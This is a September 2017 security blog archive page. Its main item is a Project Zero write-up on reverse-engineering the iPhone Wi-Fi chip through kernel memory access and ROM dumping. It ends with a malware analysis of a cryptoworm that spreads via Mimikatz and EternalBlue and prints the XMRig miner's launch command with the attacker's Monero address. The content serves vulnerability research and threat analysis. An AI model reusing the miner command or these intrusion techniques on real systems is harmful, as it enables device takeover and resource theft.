Monthly Archives: September 2017

Over The Air – Vol. 2, Pt. 1: Exploiting The Wi-Fi Stack on Apple Devices

Posted by Gal Beniamini, Project Zero

Earlier this year we performed research into Broadcom’s Wi-Fi stack. Due to the ubiquity of Broadcom’s stack, we chose to conduct our prior research through the lens of one affected family of products -- the Android ecosystem. To paint a more complete picture of the state of Wi-Fi security in the mobile ecosystem, we’ve chosen to revisit the topic - this time through the lens of Apple devices. In this research we’ll perform a deeper dive into each of the affected components, discover new attack surfaces, and finally construct a full over-the-air exploit chain against iPhones, allowing complete control over the target device.

Since there’s much ground to cover, we’ve chosen to split the research into a three-part blog series. The first blog post will focus on exploring the Wi-Fi stack itself and developing the necessary research tools to explore it on the iPhone. In the second blog post, we’ll perform research into the Wi-Fi firmware, discover multiple vulnerabilities, and develop an exploit allowing attackers to execute arbitrary code on the Wi-Fi chip itself, requiring no user-interaction. Lastly, in the final blog post we’ll explore the iPhone’s host isolation mechanisms, research the ways in which the Wi-Fi chip interacts with the host, and develop a fully-fledged exploit allowing attackers to gain complete control over the iOS kernel over-the-air, requiring no user interaction.

As we’ve mentioned before, Broadcom’s chips are present in a wide variety of devices - ranging from mobile phones to laptops (such as Chromebooks) and even Wi-Fi routers. While we’ve chosen to focus our attention on the Apple ecosystem this time around, it’s worth mentioning that the Wi-Fi firmware vulnerabilities presented in this research affect other devices as well. Additionally, as this research deals with a different attack surface in the Wi-Fi firmware, the breadth of affected devices might be wider than that of our prior research.

More concretely, the Wi-Fi vulnerabilities presented in this research affect many devices in the Android ecosystem. For example, two of the vulnerabilities (#1, #2) affect most of Samsung’s flagship devices, including the Galaxy S8, Galaxy S7 Edge and Galaxy S7. Of the two, one vulnerability is also known to affect Google devices such as the Nexus 6P, and some models of Chromebooks. As for Apple’s ecosystem, while this research deals primarily with iPhones, other devices including Apple TV and iWatch are similarly affected by our findings. The exact breadth of other affected devices has not been investigated further, but is assumed to be wider.

We’d also like to note that until hardware host isolation mechanisms are implemented across the Android ecosystem, every exploitable Wi-Fi firmware vulnerability directly results in complete host takeover. In our previous research we identified the lack of host isolation mechanisms on two of the most prominent SoC platforms; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. We are not aware of any advances in this regard, as of yet.

For the purpose of this research, we’ll demonstrate remote code execution on the iPhone 7 (the most recent iDevice at the time of this research), running iOS 10.2 (14C92). The vulnerabilities presented in this research are present in iOS up to (and including) version 10.3.3 (apart from #1, which was fixed in 10.3.3). Researchers wishing to port the provided research tools and exploits to other versions of iOS or to other iDevices would be required to adjust the referenced symbols.

Over the course of the blog post, we’ll begin fleshing out a memory research platform for iOS. Throughout this blog post series, we’ll rely on the framework extensively, to both analyse and explore components on the system, including the XNU kernel, hardware components, and the Wi-Fi chipset itself.

The vulnerabilities affecting Apple devices have been addressed in iOS 11. Similarly, those affecting Android have been addressed in the September bulletin. Note that within the Android ecosystem, OEMs bear the responsibility for providing their own Wi-Fi firmware images (partially due to their high level of customisation). Therefore the corresponding fixes should appear in the vendors’ own bulletins, rather than Android’s security bulletin.

Creating a Research Platform

Before we can begin exploring, we’ll need to lay down the groundwork first. Ideally, we’d like to create our own debugger -- allowing us to both inspect and instrument the Wi-Fi firmware, thereby making exploration (and subsequent exploit development) much easier.

During our previous research into Broadcom’s Wi-Fi chip within the context of the Android ecosystem, this task turned out to be much more straight-forward than expected. Instead of having to create an entire research environment from scratch, we relied on several properties provided by the Android ecosystem to speed up the development phase.

For starters, many Android devices allow developers to intentionally bypass their security model, using “rooted” builds (such as userdebug). Flashing such a build onto a device allows us to freely explore and interact with many components on the system. As the security model is only bypassed explicitly, the odds of side-effects resulting from our research affecting the system’s behaviour are rather slim.

Additionally, Broadcom provides their own debugging tools to the Android ecosystem, consisting of a command-line utility and a dedicated set of ioctls within Broadcom’s device driver, bcmdhd. These tools allow sufficiently privileged users to interact with the Wi-Fi chip in a variety of ways, including the ability to access the chip’s RAM directly -- an essential primitive when constructing a debugger. Basing our own toolset on this platform allowed us to create a rather comfortable research environment.

Furthermore, Android utilises the Linux Kernel, which is licensed under GPLv2. Therefore, the kernel’s source code, including that of the device drivers, is freely available. Reading through Broadcom’s device driver (bcmdhd) turned out to be an invaluable resource -- sparing us some unnecessary reverse-engineering while also allowing us to easily assess the ways in which the chip and host interact with one another.

Lastly, some of the data sheets pertaining to the Wi-Fi SoCs used on Android devices were made publicly available by Cypress following their acquisition of Broadcom’s IoT business. While most of the information in the data sheets is irrelevant to our research, we were able to gather a handful of useful clues regarding the architecture of the SoC itself.

Unfortunately, it appears we have no such luck this time around!

First, Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). Consequently, exploring different components within the device is made much more difficult.

Additionally, unlike the Android ecosystem, Apple has chosen to develop their entire host-side stack “from scratch”. Most importantly, the iOS drivers used to interact with Broadcom’s chip are written by Apple, and are not based on Broadcom’s FullMAC drivers (bcmdhd or brcmfmac). Other host-side utilities, such as Broadcom’s debugging toolchain, are thus also not included.

That said, Apple did develop their own mechanisms for accessing and debugging the chip. These capabilities are exposed via a set of privileged ioctls embedded in the IO80211Family driver. While the interface itself is undocumented, reverse-engineering the corresponding components in both the IO80211Family and AppleBCMWLANCore drivers reveals a rather powerful command channel, and one which could possibly be used for the purposes of our research. Unfortunately, access to this interface requires additional entitlements, thus preventing us from leveraging it (unless we escalate our privileges).

Lastly, there’s no overlap between the revisions of Wi-Fi chips used on Apple’s devices and those used in the Android ecosystem. As we’ll see later on, this might be due to the fact that Apple-specific Wi-Fi chips contain Apple-specific features. Regardless, perhaps unsurprisingly, none of the corresponding data sheets for these SoCs have been made available.

So… it appears we’ll have to deal with a proprietary chip, on a proprietary device running a proprietary operating system. We have our work cut out for us! That said, it’s not all doom and gloom; instead of relying on all of the above, we’ll just need to create our own independent research platform.

Acquiring the ROM?

Let’s start by analysing the SoC’s firmware and loading it up into a disassembler. As we’ve seen in the previous round of research, the Wi-Fi firmware consists of a small chunk of ROM containing most of the firmware’s data and code, and a larger blob of RAM housing all of the runtime data structures (such as the heap and stack), as well as patches to the ROM’s code.

Since the RAM blob is loaded into the Wi-Fi chip during its initialisation by the host, it should be accessible via the host’s root filesystem. Indeed, after downloading the iPhone’s firmware image, extracting the root filesystem and searching for indicative strings, we are greeted with the following result:

Great, so we’ve identified the firmware’s RAM. What’s more, it appears that the Wi-Fi chip embedded in the phone is a BCM4355C0, a model which I haven’t come across in Android devices in the past (also, it curiously does not appear under Broadcom’s website).

Regardless, having the RAM image is all well and good, but what about the ROM? After all, the majority of the code is stored in the chip’s ROM. Even if we were to settle for analysing the RAM alone, it’d be extremely difficult to reverse-engineer independently of the ROM as many of the functions in the former address data stored in the latter. Without knowing the ROM’s contents, or even its rudimentary layout, we’ll have to resort to guesswork.

However, this is where we run into a bit of a snag! To extract the ROM we’ll need to interact with the Wi-Fi chip itself... Whereas on Android we could simply use a “rooted” build to gain elevated privileges, and then access the Wi-Fi SoC via Broadcom’s debugging utilities, there are no comparable mechanisms on the iPhone. In that case, how will we interact with the chip and ultimately extract its ROM?

We could opt for a hardware-based research environment. Reviewing the data sheets for one of Broadcom’s Wi-Fi SoCs, BCM4339, reveals several interfaces through which the chip may be debugged, including UART and a JTAG interface.

That said, there are several disadvantages to this approach. First, we’d need to open up the device, locate the required interfaces, and make sure that we do not damage the phone in the process. Moreover, requiring a such a setup for each research device would cause us to incur significant start-up overhead. Perhaps most importantly, relying on a hardware-based approach would limit the amount of researchers who’d be willing to utilise our research platform -- both because hardware is a relatively specialised skill-set, and since people might (rightly) be wary of causing damage to their own devices.

So what about a completely software-based solution? After all, on Android devices we were able to access the chip’s memory solely using software. Perhaps a similar solution would apply to Apple devices?

To answer this question, let’s trace our way through the Android components involved in the control flow for accessing the Wi-Fi chip’s memory from the host. The flow begins with a user issuing a memory access command via Broadcom’s debugging utility (“membytes”). This, in turn, triggers an ioctl to Broadcom’s driver, requesting the memory access operation. After some processing within the driver, it performs the requested action by directly accessing the chip’s tightly-coupled memory (TCM) from the kernel’s Virtual Address-Space (VAS).

Two Registers Walk Into a BAR

As we’re mostly interested in the latter part, let’s disregard the Android-specific components for now and focus on the mechanism in bcmdhd allowing TCM access from the host.

Reviewing the driver’s code allows us to arrive at relevant code flow. First, the driver enables the PCIe-connected Wi-Fi chip. Then, it accesses the PCIe Configuration Space to program the Wi-Fi chip’s Base Address Registers (BARs). In keeping with the PCI standards, programming and mapping in the BARs into the host’s address space exposes functionality directly from the Wi-Fi SoC to the host, such as IO-Space or Memory Space access. Taking a closer look at Broadcom’s chips, they seem to provide two BARs in their configuration space; BAR0 and BAR1.

BAR0 is used to map-in registers corresponding to the different cores on the Wi-Fi SoC, including the ARM processor running the firmware’s logic, and more esoteric components such as the PCIe Gen 2 core on the Wi-Fi SoC. The cores themselves can be selected by accessing the PCIe configuration space once again, and programming the “BAR0 Window” register, directing it at the backplane address corresponding to the requested core.

BAR1, on the other hand, is used solely to map the Wi-Fi chip’s TCM into the host. Since Broadcom’s driver leverages the TCM access capability extensively, it maps-in BAR1 into the kernel’s virtual address space during the device’s initialisation, and doesn’t unmap it until the device shuts down. Once the TCM is mapped into the kernel, all subsequent memory accesses to the chip’s TCM are performed by simply modifying the mapped block within the kernel’s VAS. Any write operations made to the memory-mapped block are automatically reflected to the Wi-Fi chip’s RAM.

This is all well and good, but what about iOS? Since Apple develops their own drivers for interacting with Broadcom’s chips, what holds true in Broadcom’s drivers doesn’t necessarily apply to Apple’s drivers. After all, we could think of many different approaches to accessing the chip’s memory. For example, instead of mapping the entire TCM into the kernel’s memory, they might elect to only map-in certain regions of the TCM, to map it only on-demand, or even to rely on different chip-access mechanisms altogether.

To get to the bottom of this, we’ll need to start reverse-engineering Apple’s drivers. This can be done by extracting the kernelcache from the iPhone’s firmware and loading it into our favourite disassembler. After loading the kernel, we immediately come across two driver KEXTs related to Broadcom’s Wi-Fi chip; AppleBCMWLANCore and AppleBCMWLANBusInterfacePCIe.

Spending some time reverse-engineering the two drivers, it’s quickly evident what their corresponding roles are. AppleBCMWLANCore serves as a high-level driver, dealing mostly with configuring the Wi-Fi chip, handling incoming events, and chip-specific features such as offloading. In keeping with good design practices, the driver is unaware of the interface through which the chip is connected, allowing it to focus solely on the logic required to interact with the chip. In contrast, AppleBCMWLANBusInterfacePCIe, serves a complementary role; it is a low-level driver tasked with handling all the PCIe related communication protocols, dealing with MSI interrupts, and generally everything interface-related.

We’ll revisit the two drivers more in-depth later on, but for now it’s sufficient to say that we have a relatively good idea where to start looking for a potential TCM mapping -- after all, as we’ve seen, the TCM access is performed by mapping the PCIe BARs. Therefore, it would stand to reason that such an operation would be performed by AppleBCMWLANBusInterfacePCIe.

After reverse-engineering much of the driver, we come across a group of suspicious-looking functions that appear like candidates for TCM accessors. All the above functions serve the same purpose -- accessing a memory-mapped buffer, differing from one another only in the size of the word used (16, 32, or 64-bit). Anecdotally, the corresponding APIs for TCM access in the Android driver follow the same structure. What’s more, the above functions all reference the string “Memory”... We might be onto something!

Kernel Function 0xFFFFFFF006D1D9F0

Cross-referencing our way up the call-chain, it appears that all of the above functions are methods pertaining to instances of a single class, which incidentally bears the same name as that of the driver: AppleBCMWLANBusInterfacePCIe. Since several functions in the call-chain are virtual functions, we can locate the class’s VTable by searching for 64-bit words containing their addresses within the kernelcache.

To avoid unnecessary confusion between the object above and the driver, we’ll refer to the object for now on as the “PCIe object”, and we’ll refer to the driver by its full name; “AppleBCMWLANBusInterfacePCIe”.

Kernel Memory Analysis Framework

Now that we’ve identified mechanisms in the kernel possibly relating to the Wi-Fi chip’s TCM, our next course of action is to somehow access them. Had we been able to debug the iOS kernel, we could have simply placed a breakpoint on the aforementioned memory access functions, recorded the location of the shared buffer, and then used our debugger to freely access the buffer on our own. However, as it happens, iOS offers no such debugger. Indeed, having such a debugger would allow users to subvert the device’s security model...

Instead, we’ll have to create our kernel debugger!

Debuggers usually consist of two main pieces of functionality:
  1. The ability to modify the control flow of the program (e.g., by inserting breakpoints)
  2. The ability to inspect (and modify) the data being processed by the program

As it happens, modifying the kernel’s control flow on modern Apple devices (such as the iPhone 7) is far from trivial. These devices include a dedicated hardware component -- Apple’s Memory Cache Controller (AMCC), designed to prevent attackers from modifying the kernel’s code, even in the presence of full control over the kernel itself (i.e., EL1 code execution). While AMCC might make for an interesting research target in its own right, it’s not the main focus of our research at this time. Instead, we’ll have to make do with analysing and modifying the data processed by the kernel.

To gain access to the kernel, we’ll first need to exploit a privilege escalation vulnerability. Luckily, we can forgo all of the complexity involved in developing a functional kernel exploit, and instead rely on some excellent work by Ian Beer.

Earlier this year, Ian developed a fully-functional exploit allowing kernel code execution from any sandboxed process on the system. Upon successful execution, Ian’s exploit provides two primitives - memory-read and memory-write - allowing us to freely explore the kernel’s virtual address-space. Since the exploit was developed against iOS 10.2, we’ll need use the same version on our target iPhone to utilise it.

To allow for increased flexibility, we’ll aim to design our research platform to be modular; instead of tying the platform to a specific memory access mechanism, we’ll use Ian’s exploit as a “black-box”, only deferring memory accesses to the exploit’s primitives.

Moreover, it’s important that whatever system we build allows us to explore the device comfortably. Thinking about this for a moment, we can boil it down to a few basic requirements:
  1. The analysis should be done on a developer-friendly machine, not on the iPhone
  2. The platform should be scriptable and easily extensible
  3. The platform should be independent of the memory access mechanism used

To prevent any dependance on the memory access mechanism, we’ll implement a rudimentary command protocol, allowing clients to perform read or write operation, as well as offering an “execute” primitive for gadgets within the kernel’s VAS. Next, we’ll insert a small stub implementing this protocol into the exploit, allowing us to interface with the exploit as if it were a “black box”. As for the client, it can be executed on any machine, as long as it’s able to connect to the server stub and communicate using the above protocol.

A version of Ian Beer’s extra_recipe exploit with the aforementioned server stub can be found on our bug tracker, here.

Lastly, there’s the question of the research platform itself. For convenience sake, we’ve decided to develop the framework as a set of Python scripts, not unlike forensics frameworks such as Volatility. We’ll slowly grow the framework as we go along, adding scripts for each new data structure we come across.

Since the iOS kernel relies heavily on dynamic dispatch, the ability to explore the kernel in a shell-like interface allows us to easily resolve virtual call targets by inspecting the virtual pointers in the corresponding objects. We’ll use this ability extensively to assist our static analysis in place where the code is hard to untangle.

Over the course of our research we’ll develop several modules for the analysis framework, allowing interaction with objects within the XNU kernel, parts of IOKit, hardware components, and finally the Wi-Fi chip itself.

Setting Up a Test Network

Moving on, we’ll need to create a segregated test network, consisting of the target iPhone, a single MacBook (which we’ll use to interact with the iPhone), and a Wi-Fi router.

As our memory analysis framework transmits data over the network, both the iPhone and the MacBook must be able to communicate with one another. Additionally, as we’re using Xcode to deploy the exploit from the MacBook to the iPhone, it’d be advantageous if the test network allowed both devices to access the internet (so the developer profile could be verified).

Lastly, we require complete control over all aspects of our Wi-Fi router. This is since the next part of our research will deal extensively with the Wi-Fi layer. As such we’d like to reserve the ability to inject, modify and drop frames within our network -- primitives which may come in handy later on.

Putting the above requirements together, we arrive at the following basic topology:

In my own lab setup, the role of the Wi-Fi router is fulfilled by my ThinkPad laptop, running Ubuntu 16.04. I’ve connected two SoftMAC TL-WN722N dongles, one for each interface (internal and external). The internal network’s access-point is broadcast using hostapd, and the external interface connects to the internet using wpa_supplicant. Moreover, network-manager is disabled to prevent interference with our configuration.

Note that it’s imperative that the dongle used to broadcast the internal network’s access-point is a SoftMAC device (and not FullMAC) -- this will ensure that the MLME and MAC layers are processed by the host’s software (i.e., by the Linux Kernel and hostapd), allowing us to easily control the data transmitted over those layers.

The laptop is also minimally configured to perform IP forwarding and to serve as a NAT, in order to allow connections from the internal network out into the internet. In addition, I’ve set up both DNS and DHCP servers, to prevent the need for any manual configuration. I also recommend setting up DNS forwarding and blocking Apple’s software-update domains within your network (,

Depending on your work environment, it may be the case that many (or most) Wi-Fi channels are rather crowded, thereby reducing the signal quality substantially. While dropping frames doesn’t normally affect our ability to use the network (frames would simply be re-transmitted), it may certainly cause undesirable effects when attempting to run an over-the-air exploit (as re-transmissions may alter the firmware’s state substantially).

Anecdotally, scanning for nearby networks around my desk revealed around 60 Wi-Fi networks, causing quite a bit of noise (and frame loss). If you encounter the same issue, you can boost your RSSI by building a small cantenna and connecting it to your dongle:

Finding the TCM

Using our test network and memory analysis platform, let’s start exploring the kernel’s VAS!

We’ll begin the hunt by searching for the PCIe object within the kernel. After all, we know that finding the object will allow us to locate the suspect TCM mapping, bringing us closer to our goal of developing a Wi-Fi firmware debugger. Since we’re unable to place breakpoints, we’ll need to locate a “path” leading from a known memory location to that of the PCIe object.

So how will we identify the PCIe object once we come across it? Well, while the C++ standards do not explicitly specify how dynamic dispatch is implemented, most compilers tend to use the same ABI for this purpose -- the first word of every object containing virtual functions serves as a pointer to that object’s virtual table (commonly referred to as the “virtual pointer” or “vptr”). By leveraging this little tidbit, we can build our own object identification mechanism; simply read the first word of each object we come across, and check which virtual table it corresponds to. Since we’ve already located the VTable corresponding to the PCIe object we’re after, all we’d need to do is check each object against that address.

Now that we know how to identify the object, we can begin searching for it within the kernel. But where should we start? After all, the object could be anywhere in the kernel’s VAS. Perhaps we can gain some more information by taking a look at the the object’s constructor. For starters, doing so will allow us to find out which allocator is used to create the object; if we’re lucky, the object may be allocated from a special pool or stored in a static location.

Kernel Function 0xFFFFFFF006D34734

(OSObject’s “new” operator is a wrapper around kalloc - the XNU kernel allocator).

Looking at the code above, it appears that the PCIe object is not allocated from a special pool. Perhaps, instead, the object is addressable through data stored in the driver’s BSS or data segments? If so, then by following every “chain” of pointers originating in the above segments, we should be able to locate a chain terminating at our desired object.

To test out this hypothesis, let’s write a short python script to perform a depth-first search for the object, starting in the driver’s BSS and data segments. The script simply iterates over each 64-bit word and checks whether it appears to be a valid kernel virtual address. If so, it recursively continues the search by following the pointer and its neighbouring pointers (searching both forwards and backwards), stopping only when the maximal search depth is reached (or the object is located).

After running the DFS and following pointers up to 10 levels deep, we find no matching chain. It appears that none of the objects in the BSS or data segments contain a (sufficiently short) pointer chain leading to our target object.

So how should we proceed? Let’s take a moment to consider what we know about the object so far. First, the object is allocated using the XNU kernel allocator, kalloc. We also know the exact size of the allocation (3824 bytes). And, of course, we have a means of identifying the object once located. Perhaps we could inspect the allocator itself to locate the object...

On the one hand, it’s entirely possible that kalloc doesn’t keep track of in-use allocations. If so,  tracking down our object would be rather difficult. On the other hand, if kalloc does have a way of identifying past allocations, we can parse its data structures and follow the same logic to identify our object. To get to the bottom of this, let’s download the XNU source code corresponding to this version of iOS, and read through kalloc’s implementation.

After spending some time familiarising ourselves with kalloc’s implementation, we can sketch a high-level view of the allocator’s implementation. Since kalloc is a “zone allocator”, each allocated object is assigned a region from which it is drawn. Individual regions are represented by the zone_t structure, which holds all of the metadata pertaining to the zone.

The allocator’s operation can be roughly split into two phases: identifying the corresponding zone for each allocation, and carving the allocation from the zone. The identification process itself takes on three distinct flows, depending on the size of the requested allocation. Once the target zone is identified, the allocation process proceeds identically for all three flows.

So how are the allocations themselves performed? During zones’ lifetimes, they must keep track of the their internal metadata, including the zone’s size, the number of stored elements and many other bits and pieces. More importantly, however, the zone must track the state of the memory pages assigned to it. During the kernel’s lifetime, many objects are allocated and subsequently freed, causing the different zones’ pages to fill up or vacate. If each allocation triggered an iteration over all possible pages while searching for vacancies, kalloc would be quite inefficient. Instead, this is tackled by keeping track of several queues, each denoting the state of the memory pages assigned to the zone.

Among the queues stored in each zone are two queues of particular interest to us:
  • The “intermediate” queue - contains pages with both vacancies and allocated objects.
  • The “all used” queue -  contains pages with no vacancies (only filled with objects).

Putting it all together, we can identify allocated objects in kalloc by simply following the same mechanisms as those used by the allocator to locate the target zone. Once we find the matching zone, we’ll parse its queues to locate each allocation made within the zone, stopping only when we reach our target object.

Finally, we can package all of the above into a module in our analysis framework. The module allows us to either manually iterate over zones’ queues, or to locate objects by their virtual table (optionally accepting the allocation size to quickly locate the relevant zone).

Using our new kalloc module, we can search for the PCIe object using the VTable address we found earlier on. After doing so, we are finally greeted with a positive result -- the object is successfully located within the kernel’s VAS! Next, we’ll simply follow the same steps we identified in the memory accessors analysed earlier on, in order to extract the location of the suspected TCM mapping within the kernel.

Since the TCM mapping provides a view into the Wi-Fi chip’s RAM, we’d naturally expect it to begin with the same values as those we had identified in the RAM file extracted from the firmware. Let’s try and read out some of the values from the buffer and see whether it matches the RAM dump:

Great! So we’ve finally found the TCM. This brings us one step closer to acquiring the ROM, and to building a research environment for the Wi-Fi SoC.

Acquiring the ROM

The TCM mapping provides a view into the Wi-Fi chip’s RAM. While accessing the RAM is undoubtedly useful (as it allows us to gain visibility into the runtime structures used by the chip, such as the heap’s state), it does not allow us to directly access the chip’s ROM. So why did we go to all of this effort to begin with? Well, while thus far we have only used the mapped TCM buffer to read the Wi-Fi SoC’s RAM, recall that the same mapping also allows us to freely write to it -- any data written to the memory-mapped buffer is automatically reflected back to the Wi-Fi SoC’s RAM.

Therefore, we can leverage our newly acquired write access to the chip’s RAM in order to modify the chip’s behaviour. Perhaps most importantly, we can insert hooks into RAM-resident functions in the firmware, and direct their flow towards our own code chunks. As we’ve already built a patching infrastructure in the previous blog posts, we can incorporate the same code as a module in our analysis framework!

Doing so allows us to provide a convenient interface through which we simply select a target RAM function and provide a corresponding assembly stub, and the framework then proceeds to patch the function on our behalf, direct it into our shellcode to execute our hook (and emulate the original prologue), and finally return back to the original function. The shellcode stub itself is written into the top of the heap’s largest free chunk, allowing us to avoid overwriting any important data structures in the RAM.

Building on this technique, let’s insert a hook into a commonly invoked RAM function (such the the chip’s “ioctl” handler). Once invoked, our hook will simply copy small “windows” of the ROM into predetermined regions in RAM. Note that since the RAM is only slightly larger than the ROM, we cannot leak the entire ROM in one go, so we’ll have to resort to this iterative approach instead. Once a ROM chunk is copied, our shellcode stub signals completion, cause the host to subsequently extract the leaked ROM contents and notify the stub that the next chunk of ROM may be leaked.

Indeed, after inserting the hook and running the scheme detailed above, we are finally presented with a complete copy of the chip’s ROM. Now we can finally move on to analysing the firmware image!

To properly load the firmware into a disassembler, we’ll need to locate the ROM and RAM’s loading addresses, as well as their respective sizes. As we’ve seen in the past, the chip’s ROM is mapped at address zero and spans several KBs. The RAM, on the other hand, is normally mapped at a fixed, higher address.

There are multiple ways in which the RAM’s loading address can be deduced. First, the RAM blob analysed previously embeds its own loading address at a fixed offset. We can verify the address’s validity by attempting to load the RAM at this offset in a disassembler and observing that all the branches resolve correctly. Alternately, we can extract the loading address from the PCIe object we identified earlier in the kernel, as it contains both attributes as fields in the object.

Regardless, all of the above methods yield the same result -- the RAM is loaded at address 0x160000, and is 0xE0000 bytes long:

Building a Wi-Fi Firmware Debugger

Having extracted the ROM and achieved TCM access capabilities, we can also build a module to allow us to easily interact with the Wi-Fi chip. This module will act as a debugger of sorts for the Wi-Fi firmware, allowing us to gain full read/write capabilities to the Wi-Fi firmware, as well as providing several key debugging features.

Among the features present in our debugger are the abilities to inspect the heap’s freelist, execute assembly code chunks directly on the firmware, and even hook RAM-resident functions.

In the next blog post we’ll continue expanding the functionality provided by this module as we go along, resulting in a more complete research framework.

Wrapping Up

In this blog post we’ve performed our initial investigation into the Wi-Fi stack on Apple’s mobile devices. Using a privileged research platform to poke around the kernel, we managed to locate the Wi-Fi firmware’s TCM mapping in the host, and to extract the Wi-Fi chip’s ROM for further analysis. We also started fleshing out our research platform within the iOS kernel, allowing us to build our very own Wi-Fi firmware debugger, as well several modules for parsing the kernel’s structures -- useful tools for the next stage of our research!

In the next blog post, we’ll use our firmware debugger in order to continue our exploration of the Wi-Fi chip present on the iPhone 7. We’ll perform a deep dive into the firmware, discover multiple vulnerabilities and develop an over-the-air exploit for one of them, allowing us to gain full control over the Wi-Fi SoC.

QOTD – SEC Chair Clayton on Need for Cooperation

Cybersecurity must be more than a firm-by-firm or agency-by-agency effort. Active and open communication between and among regulators and the private sector also is critical to ensuring the nation’s financial system is robust and effectively protected. Information sharing and coordination are essential for regulators to anticipate potential cyber threats and respond to a major cyberattack, should one arise.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing and Urban Development United States Senate, September 26, 2017

Malware spam: "Emailing: Scan0xxx" from "Sales" delivers Locky or Trickbot

This fake document scan delivers different malware depending on the victim's location: Subject:       Emailing: Scan0963 From:       "Sales" [sales@victimdomain.tld] Date:       Thu, September 28, 2017 10:31 am Your message is ready to be sent with the following file or link attachments: Scan0963 Note: To protect against computer viruses, e-mail programs may prevent sending or receiving

Enterprise Security Weekly #63 – Temporal Tempura

Paul and John discuss network security architecture. In the news, Google Cloud acquires Bitium, Ixia extends cloud visibility, Lacework now supports Microsoft Windows Server, and more on this episode of Enterprise Security Weekly!Full Show Notes:

Visit for all the latest episodes!

Hack Naked News #142 – September 26, 2017

Tracking cars, iOS 11 patches eight vulnerabilities, Equifax dumps their CEO, High Sierra gets slammed with a 0-day, and more. Jason Wood of Paladin Security discusses an email DDos threat on this episode of Hack Naked News!Full Show Notes:

Visit for all the latest episodes!

Advanced ‘all in memory’ CryptoWorm


Today I want to share a nice Malware analysis having an interesting flow. The "interesting" adjective comes from the abilities the given sample owns. Capabilities of exploiting, hard obfuscations and usage of advanced techniques to steal credentials and run commands. 

The analyzed sample has been provided by a colleague of mine (Alessandro) who received the first stage by eMail. A special thanks to Luca and Edoardo for having recognized XMRig during the last infection stage.   

General View.

The following image shows the general view of the entire attack path. As you might appreciate from the picture, that flow could be considered a complex flow since many specific artifacts were included in the attack phases.  The initial stage starts by abusing the user inexperience taking him/her to click on a first stage file called  (in my case) y1.bat. Nowadays eMail vector is one of the most favorite vectors used by attackers and easily implemented to deliver malicious contents. Once the first stage is run, it downloads and executes a second stage file called info6.ps1: a heavy obfuscated PowerShell script which drops (by de-obfuscate it directly on body) three internal resources: 
  1. Mimikatz.dll. This module is used to steal user administrative credentials.
  2. Utilities. This module is used to scan internal networks in order to propagate the infection, it is used to run several internal utilities such as (but not limited to): de-obfuscation routines,  ordering arrays and running exploits. This module is also used to drop and execute an additional file (from the same server) named info.vbs.
  3. Exploits. This module is a set of known exploits such as eternalblue7_exploit and eternal_blue_powershell used from the initial stage of attack to infect internal machines .
Full Stage Attack Path

The last stage (info.vbs) drops and runs an executable file which has been recognized to be XMRig. XMRig is an open sourced Monero CPU Miner, freely available on github. The infection tries to propagate itself by scanning and attacking internal resources through the Exploit module, while the XMRig module mines Monero cryptocurrency giving to the attacker fresh "crypto money" by stealing victims resources. 


A romantic but still "working" .bat file is propagated to the victim by email or message. Once the user clicks on it, the .bat file would run the following command spawning a powershell able to download and run a script called info6.ps1 from

Stage1: Downloads and Run 
The downloaded powershell file is clearly divided into two macro blocks both of them obfuscated. The following image shows the two visual sections which I am going to call them: "half up" (section before the "new line") and "half down" (section after the "new line").

Stage2: Two Visual Sections to be explored
While the "half up" section fairly appears to be a Base64 encoded text file, the "half down" section looks like encoded through a crafted function which, fortunately (and certain), appears in clear text at the end of such a file. By editing that function it is possible to modify the decoding process making it saving the decoded text file directly to a desired folder. The following image shows the decoded second stage "half dow" section.  

Decoded Second Stage "Half Down"
Analyzing the section code it would be easy to agree that the main used functions are dynamically extracted from the file itself, by performing a substring operations on the current content.




The content of $fa variable and every function related to it is placed in the "half up" section which after being decoded looks like the following image.

Decoded Second Stage "Half Up"
The second stage "half up" code is borrowed from Kevin Robertson (Irken), the attacker reused many useful functionalities from Irken including the Invoke-TheHas routine which could be used through SMB to execute commands or to executes direct code having special rights. 

A surprisingly interesting line of code is found on the same stage (Second stage "half down"): NTLM= Get-creds mimi mimi  where the Get-creds function (coming from the Based64 decoded "half up") runs, by using the reflectoin techique, a DLL function. So by definition the mimi parameter has to be a DLL file included somewhere in the code. Let's grab it by running the following code: $fa.sUBStrInG(406494,1131864) Where 406494 is the start character and the 1131864 is the last character to be interpreted as a dynamic loaded library. Fortunately the dropped DLL is a well known library, widely used in penetration testing named Mimikatz. It would be clear that the attacker uses the Mimikatz library to grab user (and eventually administrators) passwords. Once the passwords stealing activity is done the Malware starts to scan internal networks for known vulnerabilities such as MS17/10. The identified exploits have been borrowed from tevora-thrat and woravit since same peace of codes, same comments and same variable names have been found. If the Malware finds vulnerability on local area networks it tries to infect the machine by injecting itself (info6.ps1) through EthernalBlue and then it begins its execution from the second Stage.

On the same thread the Malware drops and runs a .vbs file (Third Stage) and it gets persistence through WMIClass on service.

Introducing the Third Stage
 The info.vbs drops and executes from itself a compiled version of XMRIG renamed with the "mimetic" string: taskservice.exe.  Once the compiled PE file (XMRig) is placed in memory the new stage starts it by running the following commands.

Third Stage Execution of Monero Miner
The clear text Monero address is visible on the code. Unfortunately the Monero address is not trackable so far. 

Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE

and the used server is: stratum+tcp:// "%temp%\taskservice.exe  -B -o stratum+tcp:// -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE  -o stratum+tcp://  -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://   -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x" ,0
Many interesting other sections should be analyzed but for now lets stop here.


Please find some of the most interesting IoC for you convenience.

- URL:
